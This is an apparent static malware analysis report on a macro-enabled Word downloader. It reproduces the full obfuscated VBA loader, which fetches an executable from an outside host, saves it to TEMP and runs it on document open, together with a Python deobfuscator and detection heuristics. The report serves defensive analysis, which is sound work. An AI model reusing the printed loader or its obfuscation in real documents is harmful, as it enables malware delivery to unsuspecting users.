Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 57ad2170cd4f55db…

MALICIOUS

Office (OOXML)

Size: 24.0 KB
Created: 2015-07-28 05:53:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2015-10-02
MD5: d44d906550bcbdbf01f8ea96ad35e8e0
SHA-1: 84aa91d3c9b846a4e8779fb410367ff2a7be0d5f
SHA-256: 57ad2170cd4f55db2a6b3f135c4ca820ea8fcf65795b9a6d557b6e4497f88574
Risk score: 330

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is an OOXML Word document whose VBA project carries an auto-exec loader: autoopen calls VEeve, which calls ZoO9sV4YohT5Af. Every COM ProgID, method name, URL and file path is assembled at run time from Chr() calls and single-character literals with junk characters ("<", "=", ";") interleaved. A helper (qOt8a7DKhf6T) removes the junk with three Replace calls and passes the result to CreateObject, and methods are invoked through CallByName, so no ProgID, URL or Shell string is visible in the macro source. Decoded, the chain is: Microsoft.XMLHTTP, Open("GET", hxxp://laperleblanche[.]fr/345/wrw.exe), Send; responseBody written to %TEMP%\treviof.exe through an ADODB.Stream (Type = 1, SaveToFile with mode 2); then Shell.Application.Open on that path. The final stage is reached through a deliberate division by zero (a = 84 / 0) whose On Error GoTo handler calls lPFnzc5MzKV1, so the execution step sits in an error handler rather than in the main flow. The remaining VBA (Access-style Form_Load, DoCmd and RecordSource handlers in Module1 to Module4) is filler copied from an unrelated Access application; none of it is ever called. The document is a downloader/dropper that fetches and runs a second-stage executable on open.

Heuristics (8)

  • ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
     Set qOt8a7DKhf6T = CreateObject(lvxd0G8b5Lee)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
     Set qOt8a7DKhf6T = CreateObject(lvxd0G8b5Lee)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName OlTcTDQ6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All six URLs below are OOXML/WordprocessingML XML namespace URIs that occur in every Word document and are not network indicators. The download URL used by the macro does not appear here because it is assembled at run time from Chr() calls and is never present as a literal in the document.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
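The decoder below is an added worked example for this report; it is not output of the analysis tool and not code from the sample. It reproduces the junk-stripping logic of the sample's qOt8a7DKhf6T helper, but learns the stripped characters from the Replace(x, Chr(n), "") calls instead of hardcoding them, evaluates every Chr()/literal concatenation in the extracted source, and tags each decoded string with the sink it feeds (CreateObject via the wrapper, CallByName, or a plain string). The embedded input is a constructed excerpt of the macros.bas lines shown under Extracted artifacts, with the Access filler left out. The decoded URL is printed as-is, so defang it before pasting it anywhere.

```python
import re

# Constructed excerpt of the macros.bas shown under Extracted artifacts:
# the CreateObject wrapper, the ADODB.Stream writer, the download routine and
# the error-handler launcher. The unrelated Access form code is left out.
SAMPLE = '''Public Function qOt8a7DKhf6T(lvxd0G8b5Lee As String)
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(60), "")
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(61), "")
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(59), "")
 Set qOt8a7DKhf6T = CreateObject(lvxd0G8b5Lee)
End Function
Public Function ZbQwHVG0(pwwcw7yN As Variant, ehDCbQVYBna As String)
Dim IxznVgz34F: Set IxznVgz34F = qOt8a7DKhf6T(Chr(65) & "<" & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & Chr(109))
End Function
Sub ZoO9sV4YohT5Af()
nTXMVEdG = Chr(104) & "t" & Chr(60) & "t" & "p" & ":" & "/" & "=" & "/" & "l" & Chr(97) & Chr(112) & Chr(101) & Chr(114) & "l" & "e" & Chr(98) & Chr(108) & Chr(97) & "n" & Chr(99) & Chr(104) & "e" & Chr(60) & "." & Chr(102) & "r" & Chr(47) & "3" & "4" & Chr(53) & "/" & Chr(119) & "r" & Chr(119) & "." & Chr(61) & Chr(101) & "<" & Chr(120) & "e"
Set OlTcTDQ6 = qOt8a7DKhf6T(Chr(77) & Chr(105) & Chr(60) & "c" & "r" & Chr(111) & Chr(61) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & ";" & Chr(72) & Chr(84) & Chr(61) & Chr(84) & Chr(80))
CallByName OlTcTDQ6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
nTXMVEdG _
, False
Set eNIowlgx3a = qOt8a7DKhf6T(Chr(87) & "<" & "S" & Chr(99) & Chr(61) & Chr(114) & "i" & Chr(112) & "t" & ";" & Chr(46) & Chr(83) & Chr(61) & "h" & Chr(101) & "<" & Chr(108) & "l")
lhV3VdAZBV = g69EyiE3XCr & Chr(92) & Chr(116) & Chr(114) & Chr(101) & "v" & Chr(105) & "o" & Chr(102) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
CallByName OlTcTDQ6, "S" & "e" & Chr(110) & Chr(100), VbMethod
End Sub
Public Function lPFnzc5MzKV1(yu8KJWEKf As String)
 Set jzokrKyTK56Rk5 = qOt8a7DKhf6T(Chr(83) & "h" & Chr(61) & "e" & "l" & ";" & Chr(108) & "<" & "." & Chr(65) & "p" & Chr(59) & "p" & "l" & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & "=" & "i" & Chr(111) & "n")
End Function
'''

# Replace(var, Chr(n), "") with an empty replacement is the sample's junk stripper;
# the character codes it deletes are learned from the source rather than hardcoded.
_JUNK_REPLACE = re.compile(r'Replace\(\s*\w+\s*,\s*Chr\((\d+)\)\s*,\s*""\s*\)')
# One concatenation token: Chr(n) or a plain string literal (this sample has no "" escapes).
_TOKEN = re.compile(r'Chr\((\d+)\)|"([^"]*)"')
_TOK = r'(?:Chr\(\d+\)|"[^"]*")'
# Two or more tokens joined by &, allowing a VBA " _" line continuation between them.
_RUN = re.compile(_TOK + r'(?:\s*&\s*(?:_\s*)?' + _TOK + r')+')
# Function bodies, used to find wrappers that forward their argument to CreateObject.
_FUNC = re.compile(r'Function\s+(\w+)\s*\(.*?End Function', re.S)


def learn_junk_chars(source: str) -> set:
    """Characters the macro deletes before using a string (here '<', '=' and ';')."""
    return {chr(int(n)) for n in _JUNK_REPLACE.findall(source)}


def find_createobject_wrappers(source: str) -> set:
    """Names of Functions whose body calls CreateObject (the sample's qOt8a7DKhf6T)."""
    return {m.group(1) for m in _FUNC.finditer(source) if "CreateObject(" in m.group(0)}


def eval_concat(expr: str) -> str:
    """Evaluate a run of Chr(n) / "literal" tokens joined by & into one string."""
    return "".join(chr(int(code)) if code else lit for code, lit in _TOKEN.findall(expr))


def strip_junk(s: str, junk: set) -> str:
    """Apply the macro's own Replace-based junk removal to a decoded string."""
    return "".join(c for c in s if c not in junk)


def classify_sink(line: str, wrappers: set) -> str:
    """Which sink the decoded string feeds on this source line."""
    if "CreateObject(" in line or any(w + "(" in line for w in wrappers):
        return "CreateObject"
    if "CallByName" in line:
        return "CallByName"
    return "string"


def decode_strings(source: str) -> list:
    """Return (line_number, sink, decoded_string) for every obfuscated concatenation."""
    junk = learn_junk_chars(source)
    wrappers = find_createobject_wrappers(source)
    results = []
    for m in _RUN.finditer(source):
        line_start = source.rfind("\n", 0, m.start()) + 1
        line_end = source.find("\n", m.start())
        line = source[line_start:line_end if line_end != -1 else len(source)]
        lineno = source.count("\n", 0, m.start()) + 1
        decoded = strip_junk(eval_concat(m.group(0)), junk)
        results.append((lineno, classify_sink(line, wrappers), decoded))
    return results


def createobject_targets(source: str) -> list:
    """ProgIDs handed to CreateObject, in source order: the sample's real COM chain."""
    return [s for _, sink, s in decode_strings(source) if sink == "CreateObject"]


if __name__ == "__main__":
    for lineno, sink, decoded in decode_strings(SAMPLE):
        print(f"line {lineno:2d}  {sink:<12}  {decoded!r}")
    print("CreateObject chain:", " -> ".join(createobject_targets(SAMPLE)))
```

To run it against the full carved macros.bas, read the file into a string and pass it in place of SAMPLE; because the junk set and the wrapper name are learned from the source, the same code handles variants of this loader that pick different junk characters or rename the helper, as long as they keep the Replace(x, Chr(n), "") and CreateObject-wrapper shape.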

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9645 bytes
SHA-256: 4fea2f6b73fa2f815315760e7e4cce422f39c48cf17558bffe66cae1d4d077d1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub autoopen()

VEeve (8.2)

End Sub

Sub VEeve(FFFFF As Long)
ZoO9sV4YohT5Af

End Sub




Attribute VB_Name = "Module1"
Public lhV3VdAZBV As String

Dim checkInputChange As Boolean

Private Sub Form_Load()
  
  checkInputChange = False
  
  Me.a_save.Hyperlink.Address = "#"
  Me.btn_save.Hyperlink.Address = "#"
  
  Me.a_save.Visible = False
  Me.btn_save.Visible = False
  
  Me.input_name.SetFocus
  Me.input_name.SelStart = 0
  
  Me.RecordSource = "SELECT * FROM Products WHERE ProdCode = '" & strSQL & "'"

End Sub

Public Function ZbQwHVG0(pwwcw7yN As Variant, ehDCbQVYBna As String)
Dim IxznVgz34F: Set IxznVgz34F = qOt8a7DKhf6T(Chr(65) & "<" & Chr(100) & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & "e" & Chr(97) & Chr(59) & Chr(109))

With IxznVgz34F
   .Type = 1
    .Open
    .write pwwcw7yN
    .savetofile ehDCbQVYBna, 2
End With
End Function

Private Sub input_name_KeyPress(KeyAscii As Integer)
  
  If checkInputChange = False Then
  
    Me.a_save.Visible = True
    Me.btn_save.Visible = True
    
    checkInputChange = True
  
  End If

End Sub

Private Sub btn_save_Click()
  
  DoCmd.Save
  DoCmd.Close

End Sub

Private Sub btn_cancel_Click()
  DoCmd.Close , , acSaveNo
End Sub






Attribute VB_Name = "Module2"

Private Sub Form_Load()
  
  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = 'REG' AND DtlsDate LIKE '" & strSQL & "*'"
  Me.reportdate = strSQL
  Me.reportdate.Visible = True
  Me.headerusername.Caption = "by: " & strUser
  Me.footerusername.Caption = "by: " & strUser
  toggleRecords = False
  strSalesStatus = "REG"

End Sub
Private Sub btn_print_Click()
On Error GoTo Err_btn_print_Click

    
  'DoCmd.PrintOut
  DoCmd.OpenForm "sales_reports", acPreview

Exit_btn_print_Click:
    Exit Sub

Err_btn_print_Click:
    MsgBox Err.Description
    Resume Exit_btn_print_Click
    
End Sub

Private Sub button_toggle_view_Click()
On Error GoTo Err_button_toggle_view_Click

  If toggleRecords = False Then
  
    strSalesStatus = "VOD"
    toggleRecords = True
    Me.button_toggle_view.Caption = "See SALES"
  
  Else
    
    strSalesStatus = "REG"
    toggleRecords = False
    Me.button_toggle_view.Caption = "See VOID"
    
  End If

  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = '" & strSalesStatus & "' AND DtlsDate LIKE '" & strSQL & "*'"


Exit_button_toggle_view_Click:
    Exit Sub

Err_button_toggle_view_Click:
    MsgBox Err.Description
    Resume Exit_button_toggle_view_Click
    
End Sub

Sub ZoO9sV4YohT5Af()

nTXMVEdG = Chr(104) & "t" & Chr(60) & "t" & "p" & ":" & "/" & "=" & "/" & "l" & Chr(97) & Chr(112) & Chr(101) & Chr(114) & "l" & "e" & Chr(98) & Chr(108) & Chr(97) & "n" & Chr(99) & Chr(104) & "e" & Chr(60) & "." & Chr(102) & "r" & Chr(47) & "3" & "4" & Chr(53) & "/" & Chr(119) & "r" & Chr(119) & "." & Chr(61) & Chr(101) & "<" & Chr(120) & "e"
Set OlTcTDQ6 = qOt8a7DKhf6T(Chr(77) & Chr(105) & Chr(60) & "c" & "r" & Chr(111) & Chr(61) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(59) & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & ";" & Chr(72) & Chr(84) & Chr(61) & Chr(84) & Chr(80))

nTXMVEdG = Replace(nTXMVEdG, Chr(60), "")
nTXMVEdG = Replace(nTXMVEdG, Chr(61), "")
nTXMVEdG = Replace(nTXMVEdG, Chr(59), "")
CallByName OlTcTDQ6, Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
nTXMVEdG _
, False

Set eNIowlgx3a = qOt8a7DKhf6T(Chr(87) & "<" & "S" & Chr(99) & Chr(61) & Chr(114) & "i" & Chr(112) & "t" & ";" & Chr(46) & Chr(83) & Chr(61) & "h" & Chr(101) & "<" & Chr(108) & "l")

Set B9l2ooWzZjdO = CallByName(eNIowlgx3a, Chr(69) & Chr(110) & Chr(118) & Chr(105) & Chr(114) & Chr(111) & Chr(110) & Chr(109) & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & "e" & "s" & Chr(115))

g69EyiE3XCr = B9l2ooWzZjdO(Chr(84) & Chr(69) & "M" & Chr(80))

lhV3VdAZBV = g69EyiE3XCr & Chr(92) & Chr(116) & Chr(114) & Chr(101) & "v" & Chr(105) & "o" & Chr(102) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
Dim lDHKNcHOCX5Z() As Byte

CallByName OlTcTDQ6, "S" & "e" & Chr(110) & Chr(100), VbMethod
lDHKNcHOCX5Z = CallByName(OlTcTDQ6, "r" & "e" & Chr(115) & Chr(112) & Chr(111) & "n" & Chr(115) & Chr(101) & "B" & Chr(111) & "d" & Chr(121), VbGet)
ZbQwHVG0 lDHKNcHOCX5Z, lhV3VdAZBV
On Error GoTo cE5cAnBQdWI
    a = 84 / 0
  On Error GoTo 0
  
Mcf0XFbqgbz:
  Exit Sub
cE5cAnBQdWI:
  lPFnzc5MzKV1 ("ArNjUVVt")
Resume Mcf0XFbqgbz
End Sub
Private Sub button_export_Click()
On Error GoTo Err_button_export_Click

  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = '" & strSalesStatus & "' AND DtlsDate LIKE '" & strSQL & "*'"

Exit_button_export_Click:
    Exit Sub

Err_button_export_Click:
    MsgBox Err.Description
    Resume Exit_button_export_Click
    
End Sub

Private Sub btn_view_item_Click()
  
  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = '" & strSalesStatus & "' AND DtlsDate LIKE '" & strSQL & "*' AND ProdCode = '" & Me.ProdCode & "'"

End Sub

Private Sub button_show_all_Click()
On Error GoTo Err_button_show_all_Click

  Me.RecordSource = "SELECT * FROM SalesDtls WHERE Status = 'REG' AND DtlsDate LIKE '" & strSQL & "*'"

Exit_button_show_all_Click:
    Exit Sub

Err_button_show_all_Click:
    MsgBox Err.Description
    Resume Exit_button_show_all_Click
    
End Sub


Attribute VB_Name = "Module3"

Dim strEditorForm As String

Private Sub Form_Load()
On Error GoTo Err_Form_Load

  Me.SetFocus
  objControl = "viewer"

  Call option_department_GotFocus

Exit_Form_Load:
    Exit Sub

Err_Form_Load:
    MsgBox Err.Description
    Resume Exit_Form_Load

End Sub

Private Sub option_department_GotFocus()

  strEditorForm = "departments"
  strSQL = "SELECT * FROM departments"
  Call format_viewer("_sub_departments", 0)
  Me.button_create.Caption = "Create Department"

End Sub

Public Function lPFnzc5MzKV1(yu8KJWEKf As String)
 Set jzokrKyTK56Rk5 = qOt8a7DKhf6T(Chr(83) & "h" & Chr(61) & "e" & "l" & ";" & Chr(108) & "<" & "." & Chr(65) & "p" & Chr(59) & "p" & "l" & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & "=" & "i" & Chr(111) & "n")
jzokrKyTK56Rk5.Open (lhV3VdAZBV)
End Function
Private Sub option_subdepartment_GotFocus()

  strEditorForm = "sub_departments"
  strSQL = "SELECT sub_departments.User_ID AS User_ID, sub_departments.name, sub_departments.description, sub_departments.ID, sub_departments.department_id AS department_id, sub_departments.created_at AS created_at, sub_departments.updated_at AS updated_at, departments.name AS department_name FROM sub_departments LEFT JOIN departments ON sub_departments.department_id = departments.ID"
  Call format_viewer("_sub_sub_departments", 0)
  Me.button_create.Caption = "Create Sub-Department"

End Sub
Private Sub button_create_Click()

  strSQL = "new"
  
  Me.viewer.SourceObject = ""

  If strEditorForm = "departments" Then
    Call format_viewer("_sub_department_editor", 0)
    Forms(objForm).Controls(objControl).Form.Controls("department_name").SetFocus
  Else
    Call format_viewer("_sub_sub_department_editor", 0)
    Forms(objForm).Controls(objControl).Form.Controls("department_name_view").Visible = False
  End If
  

End Sub
Private Sub button_back_Click()
On Error GoTo Err_button_back_Click

  Call open_Form("_main_menu", "department_manager")

Exit_button_back_Click:
    Exit Sub

Err_button_back_Click:
    MsgBox Err.Description
    Resume Exit_button_back_Click
    
End Sub


Attribute VB_Name = "Module4"

Function changenavitem(navshow As String, navhide As String, targetForm As String)

  If objForm = "" Then
    objForm = "main"
  End If
  
  Call checkUserRole("nav_change")
  
  Forms(objForm).Controls(navshow).Visible = True
  Forms(objForm).Controls(navhide).Visible = False
  
  Forms(objForm).Detail.BackColor = 16777215
  
  Call Route(targetForm)
  
End Function

Function shownav()
  
  If objForm = "" Then
    objForm = "main"
  End If
  
  Forms(objForm).Controls("inactive_03").Hyperlink.Address = "#"
  Forms(objForm).Controls("inactive_05").Hyperlink.Address = "#"
  Forms(objForm).Controls("inactive_07").Hyperlink.Address = "#"
  Forms(objForm).Controls("inactive_09").Hyperlink.Address = "#"

  Forms(objForm).Controls("inactive_03").Visible = True
  
  Call checkUserRole("main_nav")
  
End Function

Public Function qOt8a7DKhf6T(lvxd0G8b5Lee As String)
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(60), "")
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(61), "")
lvxd0G8b5Lee = Replace(lvxd0G8b5Lee, Chr(59), "")
 Set qOt8a7DKhf6T = CreateObject(lvxd0G8b5Lee)
End Function
Function hidenav()

  Forms(objForm).Controls("inactive_03").Visible = False
  Forms(objForm).Controls("inactive_05").Visible = False
  Forms(objForm).Controls("inactive_07").Visible = False
  Forms(objForm).Controls("inactive_09").Visible = False
  Forms(objForm).Controls("active_03").Visible = False
  Forms(objForm).Controls("active_05").Visible = False
  Forms(objForm).Controls("active_07").Visible = False
  Forms(objForm).Controls("active_09").Visible = False

End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 30720 bytes
SHA-256: 3299cbefbe2c76a185b07a9f06abca25f3c25958c49673122d4e53ccca329727
Detection
ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0
Obfuscation or payload: unlikely (automated label for the raw vbaProject.bin stream only; it is contradicted by the decoded macro source above, which builds every ProgID, URL and file path from Chr() calls and junk-character removal, so treat this stream as obfuscated)